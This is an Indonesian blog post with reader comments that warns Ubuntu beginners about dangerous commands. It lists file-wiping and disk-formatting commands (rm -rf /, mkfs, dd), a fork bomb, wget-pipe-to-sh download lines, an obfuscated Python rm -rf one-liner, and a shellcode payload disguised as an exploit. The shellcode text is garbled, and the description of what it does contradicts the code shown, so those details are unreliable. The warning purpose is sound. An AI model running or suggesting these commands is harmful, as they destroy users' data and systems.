Perintah Berbahaya (Yang Seharusnya Tidak Dijalankan) di Ubuntu

|

Seperti yang telah dibahas mengenai command line di Ubuntu, bahwa perintah text (command line) memiliki fungsi yang sangat penting dalam operasional Ubuntu khususnya ataupun Linux secara umum. Namun ada beberapa perintah yang justru akan SANGAT BERBAHAYA jika dilakukan terutama oleh para pemula pengguna ubuntu, karena dapat merusak sistem operasi Ubuntu itu sendiri,
Berikut ini beberapa perintah yang akan merusak sistem operasi Ubuntu!

PERHATIAN : Jangan gunakan atau mencoba perintah-perintah berikut ini tanpa mempunyai pengetahuan yang memadai mengenainya. Cukup anda baca dan ketahui saja, tidak perlu di-praktekan !
Perintah yang akan menghapus file anda di komputer :
sudo rm -rf / (akan menghapus semua file di sistem anda) - hak administrator diperlukan!
sudo rm -rf . sudo rm-rf. (akan menghapus direktori yang dimana anda sedang bekerja saat itu) - hak administrator diperlukan!
sudo rm -rf * (akan menghapus semua file yang terdapat dalam folder aktif) - hak administrator diperlukan!
rm -rf * or rm -rf *.* (akan menghapus semua file yang terdapat dalam folder aktif) - Tidak ada hak administrator diperlukan!
rm -rf ~/ & (akan menghancurkan direktori home) - Tidak ada hak administrator diperlukan

Perintah yang akan menghapus hardisk anda !
sudo mkfs (akan format hard drive anda) - hak administrator diperlukan!
sudo mkfs.ext3 (akan format hard drive anda) - hak administrator diperlukan!
sudo mkfs.bfs (akan format hard drive anda) - hak administrator diperlukan!
sudo mkfs.cramfs (akan format hard drive anda) - Tidak ada hak administrator diperlukan!
sudo mkfs.ext2 (akan format hard drive anda) - hak administrator diperlukan!
sudo mkfs.minix (akan format hard drive anda) - hak administrator diperlukan!
sudo mkfs.msdos (akan format hard drive anda) - hak administrator diperlukan!
sudo mkfs.reiserfs (akan format hard drive anda) - hak administrator diperlukan!
sudo mkfs.vfat (akan format hard drive anda) - hak administrator diperlukan!

Perintah "dd" adalah perintah yang bisa sangat berbahaya, terutama bila Anda tidak tahu apa kegunaannya! Berikut adalah beberapa contoh, tapi ingat bahwa perintah ini dapat sangat bervariasi !
sudo dd if=/dev/zero of=/dev/hda (PERINTAH PALING BERBAHAYA ! Ini akan benar-benar menghapus seluruh primary IDE Hard drive anda) (diperlukan hak administrator)
sudo dd if=/dev/hda of=/dev/hdb (dibutuhan hak administrator)
sudo dd if=something of=/dev/hda (dibutuhan hak administrator)
PERINGATAN: /dev/hda dan /dev/hdb pada contoh diatas dapat diganti dengan /dev/sda atau /dev/sdb dalam kasus SATA dan SCSI.

Block device manipulation: Menyebabkan data mentah akan ditulis ke perangkat blok (block device). Sering kali ini akan menyerang filesystem dan menyebabkan hilangnya data secara total !
any_command > /dev/sda
dd if=something of=/dev/sda

Forkbomb: adalah sebuah script berbahaya yang akan menjalankan sejumlah proses sampai sistem freezes, ini akan memaksa Anda untuk melakukan reboot keras (hard reboot) yang dapat menyebabkan kerusakan pada sistem anda.

Perintah di bawah ini terlihat sangat menarik dan keingintahuan pengguna baru dan kurang berpengalaman untuk jalankannya ! JANGAN JALANKAN PERINTAH-PERINTAH BERIKUT !

CODE :
:(){:|:&};:
CODE :
fork while fork

Tarbomb: Katakanlah bahwa seseorang ingin membantu anda, ia menawarkan sebuah arsip tar.gz atau tar.bz2 dan meminta Anda untuk mengambil ke dalam direktori yang sudah ada. Arsip ini dapat meledak menjadi jutaan file, atau inject file lainnya yang ada ke dalam sistem dengan menerka nama filenya. Anda harus membiasakan diri untuk decompressing atau mengekstrak arsip tar.gz atau tar.bz2 di dalam sebuah direktori baru yang kosong !

Decompression bomb : Ini contoh lain. Katakanlah seseorang meminta Anda untuk mengambil arsip yang nampaknya kecil untuk di-download. Dalam kenyataan itu adalah data yang sangat dikompresi dan akan mengembang ke ratusan Gigabites, mengisi hard drive anda sampai freezes! Anda tidak perlu menghiraukan data yang tidak bisa dipercaya dari satu sumber!

Shellscript: Yang satu ini sangat berbahaya! Seseorang memberikan Anda link untuk men-download sebuah shellscript dan kemudian mereka akan meminta Anda untuk jalankan. Script ini dapat berisi perintah berbahaya yang telah dia pilih, dan itu akan merusak sistem anda. Jangan menjalankan kode dari orang yang tidak dipercaya! Berikut adalah beberapa contoh:
CODE :
wget http://my_site/my_file
sh ./some_file
Contoh:
wget http://ceattingal.ac.in/malicious-script
sh ./malicious-script
atau
wget http://my_site/my_file -O- | sh
Contoh:
wget http://ihrd.org/malicious-script -O- | sh

Compiling code: Beberapa orang memberikan kode sumber (source code) untuk suatu aplikasi dan memberitahu Anda untuk meng-kompilasi-nya. Cukup mudah untuk menyembunyikan kode berbahaya di sisi bundel besar dari source code, maka penyerang dapat dengan mudah merusak sistem anda. Jadi Jangan kompilasi atau menjalankan kode dikompilasi kecuali sumber adalah berasal dari beberapa aplikasi yang sudah cukup dikenal, yang diperoleh dari sebuah situs terkemuka / bereputasi.

Contoh yang cukup terkenal, di suatu milis disamarkan sebagai untuk mengklaim bukti mengenai konsep sudo, bahwa jika anda menjalankan ini, sudo memberikan kepada anda akses root tanpa shell. There was this payload: Berikut ini payload tersebut :

CODE :
char esp[] __attribute__ ((section(”.text”))) /* esp
release */
= “xebx3ex5bx31xc0×50x54×5ax83xecx64×68″
“xffxffxffxffx68xdfxd0xdfxd9×68x8dx99″
“xdfx81×68x8dx92xdfxd2×54x5exf7×16xf7″
“x56×04xf7×56x08xf7×56x0cx83xc4×74x56″
“x8dx73×08x56×53x54×59xb0×0bxcdx80×31″
“xc0×40xebxf9xe8xbdxffxffxffx2fx62×69″
“x6ex2fx73×68x00×2dx63×00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Untuk pengguna yang masih baru dan pengguna komputer yang kurang berpengalaman, ini terlihat seperti "hex code gibberish stuff" yang biasanya merupakan konsep yang telah terbukti aman. Namun, ini sebenarnya menjalankan perintah "rm -rf ~ / &" yang akan menghancurkan direktori home jika dijalankan sebagai user biasa, atau semua file jika dijalankan sebagai root.

Berikut adalah contoh lain dari kode yang seharusnya tidak dijalankan oleh siapa saja!

CODE : python -c ‘import os; os.system(”".join([chr(ord(i)-1) for i in “sn!.sg!+”]))’

Dimana “sn!.sg!+” adalah merupakan kode lain rm -rf *.

Ini hanyalah merupakan peringatan kepada pengguna baru dan pengguna yang masih belum berpengalaman. Anda harus mengetahui perintah di atas, jangan coba menjalankan perintah-perintah tersebut tanpa disertai pengetahuan yang memadai mengenainya.
(sumber : ubuntulinux.today.com)

Comments :

Anonymous said...

lieur euy bahasa naon eta teh ??? pabaliut kitu !

Anonymous said...

hehehe... teuing euy....bahasa alien sigana teh... :D

Anonymous said...

sipp sipp :)
makasih ilmuny :)

____
thom_

Anonymous said...

sama-sama :D

Anonymous said...

weks.... lumayan lah walaopun lom ngeh, btw thak's bwt postingannya..

Anonymous said...

makasih buat postingannya ini... sangat berguna... kalo karmic koala ku minta di-maintenance tuh aku kudu gimana? soalnya gak bisa masuk ke desktop nih... pusing ni kepala... >.<

ocid said...

wah...minta di-maintenance nya gimana mas ? Setahuku biarin aja. Pengalaman saya secara periodik Ubuntu emang biasa melakukan maintenance. Biasanya pas lagi booting. Dibiarin aja jalan, ntar juga masuk ke Desktop-nya kok...

Post a Comment

Tolong jangan diisi dengan spam ya....